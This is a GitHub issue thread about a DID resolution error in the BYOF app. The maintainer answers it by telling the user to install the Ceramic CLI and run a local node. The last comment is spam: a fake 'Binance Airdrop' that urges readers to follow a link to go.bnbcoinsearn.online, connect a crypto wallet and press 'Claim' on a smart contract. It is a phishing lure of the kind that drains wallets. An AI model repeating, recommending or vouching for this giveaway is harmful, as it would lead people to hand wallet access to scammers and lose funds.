### ISSUE TITLE
 Failed to resolve did

### ISSUE THREAD

**Issue by nuoyz** [enricobottazzi/BYOF#1]
Failed to resolve did:xxx

at DID.<anonymous> (did.ts:340)
    at Generator.next (<anonymous>)
    at fulfilled (resolver.ts:226)

**Comment by enricobottazzi** [comment]
Hey @nuoyz thanks for the feedback. The app at the moment run on a local Ceramic node so that's why you are getting that error. You can try that by installing Ceramic CLI
``` npm install -g @ceramicnetwork/cli ``` 
and ``` ceramic daemon ```

Then it should work.
Let me know if you have any other issue 🙌

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @
